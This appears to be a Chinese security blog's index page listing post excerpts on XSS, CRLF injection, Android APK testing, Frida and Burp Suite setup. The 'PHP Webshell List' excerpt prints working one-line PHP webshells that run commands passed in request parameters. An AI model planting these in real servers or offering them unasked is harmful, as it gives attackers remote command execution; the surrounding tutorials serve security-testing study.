上一页 1 ··· 3 4 5 6 7
  2020年3月26日
PHP Webshell List
摘要: 基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
posted @ 2020-03-26 22:41 Mysticbinary 阅读(470) 评论(0) 推荐(0)
macOS下Chrome和Safari导入证实抓包HTTPS
摘要: 目录下载证书mac OS导入证书Chrome设置代理Safari设置代理 下面的操作基于Mac OS Catalina(v10.15.3),抓包拦截工具基于Burp Suite v2.1.05。 下载证书 将Burp Suite 的证书下载到本地任意一个路径下。如果使用其它抓包工具,自行搜索一下。 阅读全文
posted @ 2020-03-26 21:53 Mysticbinary 阅读(5024) 评论(0) 推荐(2)
  2020年3月24日
CRLF注入原理
摘要: CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。 在HTTP当中HTTP的Header和Body之间就是用两个 阅读全文
posted @ 2020-03-24 17:02 Mysticbinary 阅读(10080) 评论(2) 推荐(0)
  2020年3月22日
DOM-XSS攻击原理与防御
摘要: 目录XSSDOM文档利用原理DOM-XSS 场景一:innerHTMLDOM-XSS 场景二:跳转DOM-XSS 场景三:evalDOM-XSS 场景四:cookie、referrerDOM-XSS 场景五:document.write 、document.URL.indexOf("id=")防护策 阅读全文
posted @ 2020-03-22 18:53 Mysticbinary 阅读(37268) 评论(2) 推荐(7)
  2020年1月6日
XSS Payload List
摘要: 标签、事件、属性 xss的攻击原理就是前端被插入了恶意的js代码,下面展示大部分可以执行js的标签、事件、属性; 标签(label) <script> <a> <p> <img> <body> <button> <var> <div> <style> <iframe> <object> <input 阅读全文
posted @ 2020-01-06 21:55 Mysticbinary 阅读(3308) 评论(0) 推荐(0)
  2019年12月27日
APK签名替换检测
摘要: APK二次打包的危害 APK二次打包是Android应用安全风险中的一部分, 一般是通过反编译工具向应用中插入广告代码与相关配置,再在第三方应用市场、论坛发布。打包党对移动App带来的危害有以下几种: 1. 插入自己广告或者删除原来广告; 2. 恶意代码, 恶意扣费、木马等; 3. 修改原来支付逻辑 阅读全文
posted @ 2019-12-27 15:40 Mysticbinary 阅读(3719) 评论(0) 推荐(5)
检测APK是否存在Janus漏洞步骤
摘要: Janus说明 Android APP仅使用V1签名,可能存在Janus漏洞(CVE 2017 13156),Janus漏洞(CVE 2017 13156)允许攻击者在不改变原签名的情况下任意修改APP中的代码逻辑。 影响范围:Android系统5.1.1 8.0 检测方式 方式1 使用GetApk 阅读全文
posted @ 2019-12-27 15:18 Mysticbinary 阅读(2533) 评论(0) 推荐(1)
  2019年12月25日
单元测试与安全测试浅析
摘要: 目录测试的意义测试用例测试函数功能案例assert关键字的用法测试类功能案例安全测试案例-短信轰炸__main__全局变量解释总结 测试的意义 人们针对一个具体问题,通过分析和设计,最后用编程语言写出了一个程序,如果它通过了语言解释器(编译器)的检查,可以运行了,那么下一步的工作就是设法确认它确实满 阅读全文
posted @ 2019-12-25 22:40 Mysticbinary 阅读(1070) 评论(2) 推荐(3)
  2019年12月23日
Python requests库模拟浏览器行为的一些技巧记录
摘要: 如下都是一些经验之谈,不定期更新,喜欢可以关注哦。 忽略ssl报错 一些证书问题会导致程序报错,解决方法为在发送请求的时候,带上verify=False参数即可; result = requests.get(burp0_url, headers=burp0_headers, verify=False 阅读全文
posted @ 2019-12-23 20:46 Mysticbinary 阅读(2486) 评论(0) 推荐(1)
  2019年12月22日
Python with语句和过程抽取思想
摘要: 目录使用with语句前后对比with语句的执行原理自定义open函数总结参考 编程中有很多操作都是配套使用的,这种配套的流程可以称为计算过程,Python语言为这种计算过程专门设计了一种结构:with语句。比如文件处理就是这类计算过程的典型代表。 使用with语句前后对比 没有使用with语句之前, 阅读全文
posted @ 2019-12-22 23:22 Mysticbinary 阅读(661) 评论(1) 推荐(3)
  2019年12月17日
Python利用PyExecJS库执行JS函数-实战破解字段加密
摘要: 目录PyExecJS 使用案例查看JS引擎信息安装PhantomJS步骤案例11.访问目标网站的登录页面并查看源码2.将js放到和py脚本同一级目录下3. 编写Python脚本来调用js案例21.找登录时的加密函数2.监听鼠标点击事件查看流程3.写代码不同浏览器内核版本对URL编码处理也不同[冷知识 阅读全文
posted @ 2019-12-17 17:41 Mysticbinary 阅读(3058) 评论(0) 推荐(3)
  2019年12月10日
Frida用法之函数操作
摘要: Frida接口功能介绍 Frida是个so级别的hook框架,它可以帮助开发、安全人员对指定的进程的so模块进行分析。它主要提供了功能简单的Python接口和功能丰富的JS接口,使得hook函数和修改so可以编程化,接口中包含了主控端与目标进程的交互接口。 目标进程的交互接口分为: JS接口 功能包 阅读全文
posted @ 2019-12-10 14:17 Mysticbinary 阅读(9832) 评论(0) 推荐(2)
  2019年12月9日
Frida的安装步骤基于Android系统组合Python语言
摘要: Frida是什么 我觉得官网已经说得很清楚了。简单的说就是一款动态代码检测工具,可用于各种主流操作系统,这里主要讨论的是动态检测Android系统里面代码运行情况。 Android版的Frida环境的搭建主要分为两个部分,一部分是运行在Android机器上的代理工具 ,另一部分是Windows系统用 阅读全文
posted @ 2019-12-09 19:18 Mysticbinary 阅读(4156) 评论(0) 推荐(2)
  2019年12月8日
使用Python threading库 测试条件竞争
摘要: 目录Burp + Python threading库1. Burp Suite安装插件2. 拦截包并拷贝发包的代码3. 运行Python多线程代码4. 确认结果Burp + RepeaterBurp + Turbo Intruder插件修复Reference 有时候想看看Web应用在代码或者数据库层 阅读全文
posted @ 2019-12-08 22:49 Mysticbinary 阅读(1170) 评论(1) 推荐(1)
  2019年11月26日
crontab 定时任务没有响应 检测步骤
摘要: 目录在线调试设置规则检查crontab是否启动检查crontab日志检查账号权限和路径 在线调试 https://tool.lu/crontab/ 设置规则 # 每分钟执行一次 */1 * * * * /scripts/script.sh # 每小时执行一次 0 */1 * * * /scripts 阅读全文
posted @ 2019-11-26 11:50 Mysticbinary 阅读(660) 评论(0) 推荐(1)
  2019年11月21日
解决Android killer APK 编译失败,无法继续下一步签名
摘要: 报错特征 在应用市场上下载了一个APK,使用Androd killer的编译的功能,结果报错了,报错信息如下: 解决 解决方式有如下几种,方式多的原因是因为系统对APK的打包方式不同,就导致对应的反编译方式也会不同 方式一 切换JDK版本 可能编写APK的JDK版本是1.7,但是你用1.8来反编译, 阅读全文
posted @ 2019-11-21 19:20 Mysticbinary 阅读(14758) 评论(0) 推荐(1)
  2019年11月19日
Python安装MySQL库的一些坑
摘要: pip安装库时遇到的问题 我使用ubuntu系统通过pip安装MySQLdb库的时候,报了一堆错,解决了半天,没搞定。然后安装另一个库pymysql一下就OK了,它们的功能都是一样的,为什么不行没有研究,这里就做一下记录吧,防止下次在遇到这个问题。 Windows OS 使用MySQLdb库 Lin 阅读全文
posted @ 2019-11-19 19:17 Mysticbinary 阅读(440) 评论(0) 推荐(3)
  2019年10月17日
Python生成multipart/form-data格式数据
摘要: 目录需求背景multipart/form-data 格式结构解析使用requests-toolbelt的MultipartEncoder 构造关于boundary的作用参考文章 需求背景 想用requests做一个自动上传的功能,发现失败了,比如直接发POST包,或者直接data=二进制流,都会上传 阅读全文
posted @ 2019-10-17 16:29 Mysticbinary 阅读(10383) 评论(0) 推荐(1)
  2019年10月16日
Python的selenium库的安装
摘要: 目录第一步pip install第二步Python运行Demo selenium是的作用是模拟点击浏览器上的按钮,配合一个无头浏览器就可以快速解决一些前端需要加解密的功能。 第一步pip install selenium安装的第一步就是用pip把模块下载回来。 pip install seleniu 阅读全文
posted @ 2019-10-16 19:00 Mysticbinary 阅读(2804) 评论(0) 推荐(2)
  2019年9月30日
Android导入Burp Suite证书抓包HTTPS
摘要: 目录需求设置代理Burp Suite代理端设置Android端设置发现证书问题先导出cacert.cer证书传送到Android端Android安装CA证书测试HTTPSAndroid端第二种安装证书的方式更新 需求 Android APP安全测试时,主要工作分为: APK安全 业务安全 APK安全 阅读全文
posted @ 2019-09-30 18:37 Mysticbinary 阅读(14963) 评论(0) 推荐(3)
  2019年9月29日
AndroidKiller工具反编译APK包记录
摘要: 报错背景 今天使用AndroidKiller V1.3.1,反编译一个APK,遇到如下报错: 当前 Apktool 使用版本:Android Killer Default APKTOOL 正在反编译 APK,请稍等... >I: 使用 ShakaApktool 2.0.0-20150914 >I: 阅读全文
posted @ 2019-09-29 20:13 Mysticbinary 阅读(28731) 评论(3) 推荐(2)
上一页 1 ··· 3 4 5 6 7